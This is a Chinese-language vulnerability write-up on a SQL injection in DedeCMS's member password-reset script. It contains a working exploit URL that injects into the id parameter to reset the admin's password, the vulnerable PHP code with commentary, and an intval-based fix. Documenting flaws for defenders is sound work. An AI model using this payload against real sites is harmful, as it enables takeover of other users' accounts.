dedecms /member/resetpassword.php SQL Injection Vul
2023-09-27 14:28:11 时间
catalog
1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考
1. 漏洞描述
DEDEcms SQL注入漏洞导致可以修改任意用户密码
2. 漏洞触发条件
1. 注册一个用户 2. 找回密码,选择通过安全问题取回: http://localhost/dedecms5.5/member/resetpassword.php 3. 填写完毕信息之后点击确认 4. 然后点击确认,会跳转到这样一个URL上: http://localhost/dedecms5.5/member/resetpassword.php?dopost=getpasswd&id=2&key=zPnruOY7 //黑客就可以构造EXP如下 http://127.0.0.1/dedecms5.5/member/resetpassword.php?dopost=getpasswd&id=xx' or userid='admin' and '2&key=zPnruOY7&setp=2&pwd=111222&pwdok=111222 //把上面url中的2改成之前跳转到链接的id参数,然后把key也改成之前跳转的链接的key参数 //然后userid可以修改成你需要修改密码的用户: admin //pwd和pwdok就是需要修改成的密码必须保持一样: md5(111222)=00b7691d86d96aebd21dd9e138f90840
修改成功
Relevant Link:
http://www.wooyun.org/bugs/wooyun-2010-042167
3. 漏洞影响范围
4. 漏洞代码分析
/member/resetpassword.php
.. elseif($dopost == "getpasswd") { //修改密码 if(empty($id)) { ShowMsg("对不起,请不要非法提交","login.php"); exit(); } //只匹配出了所有的数字 $mid = ereg_replace("[^0-9]","",$id); $row = $db->GetOne("Select * From #@__pwd_tmp where mid = '$mid'"); if(empty($row)) { ShowMsg("对不起,请不要非法提交","login.php"); exit(); } if(empty($setp)) { $tptim= (60*60*24*3); $dtime = time(); if($dtime - $tptim > $row['mailtime']) { $db->executenonequery("DELETE FROM `#@__pwd_tmp` WHERE `md` = '$id';"); ShowMsg("对不起,临时密码修改期限已过期","login.php"); exit(); } require_once(dirname(__FILE__)."/templets/resetpassword2.htm"); } //攻击poc进入这个流支 elseif($setp == 2) { if(isset($key)) { $pwdtmp = $key; } $sn = md5(trim($pwdtmp)); if($row['pwd'] == $sn) { if($pwd != "") { if($pwd == $pwdok) { $pwdok = md5($pwdok); $sql = "DELETE FROM `#@__pwd_tmp` WHERE `mid` = '$id';"; $db->executenonequery($sql); //$id没有经过任何过滤就带入了SQL查询,导致了update注入 $sql = "UPDATE `#@__member` SET `pwd` = '$pwdok' WHERE `mid` = '$id';"; if($db->executenonequery($sql)) ..
5. 防御方法
/member/resetpassword.php
/* 对$id变量进行规范化 */ $id = isset($id)? intval($id) : 0; /* */
6. 攻防思考
Copyright (c) 2015 LittleHann All rights reserved
相关文章
- PHP OCR实战:用Tesseract从图像中读取文字
- RED_HAWK:基于PHP实现的信息收集与SQL注入漏洞扫描工具
- nginx unit PHP
- PHP中如何防止SQL注入
- PHP获取http头信息和CI中获取HTTP头信息的方法
- PHP 获取指定日期的星期几的方法
- PHP大小写:函数名和类名不区分,变量名区分
- PHP mysql_real_escape_string() 函数防SQL注入
- 使用PHP与SQL搭建可搜索的加密数据库
- 70.网络安全渗透测试—[SQL注入篇9]—[MySQL+PHP-延时注入]
- 69.网络安全渗透测试—[SQL注入篇8]—[MySQL+PHP-报错注入读写文件]
- 66.网络安全渗透测试—[SQL注入篇5]—[MySQL+PHP-手工注入简单示例]
- phpcms /api/phpsso.php SQL Injection Vul
- ecshop /goods.php SQL Injection Vul
- Cacti /graphs_new.php SQL Injection Vulnerability
- PHPCMS phpcmsmodulesmemberindex.php 用户登陆SQL注入漏洞分析
- discuz /faq.php SQL Injection Vul
- ecshop /category.php SQL Injection Vul
- dedecms /member/uploads_edit.php SQL Injection Vul
- dedecms /member/reg_new.php SQL Injection Vul
- dedecms /member/myfriend_group.php SQL Injection Vul
- dedecms /member/flink_main.php SQL Injection Vul
- dedecms /include/uploadsafe.inc.php SQL Injection Via Local Variable Overriding Vul
- dedecms /plus/search.php SQL Injection && Local Variable Overriding
- QIBO CMS SQL Injection Via Variable Uninitialization In memberspecial.php
- Getshell Via phpmyadmin SQL Execution In /import.php To Write Evil Webshell File Into Disk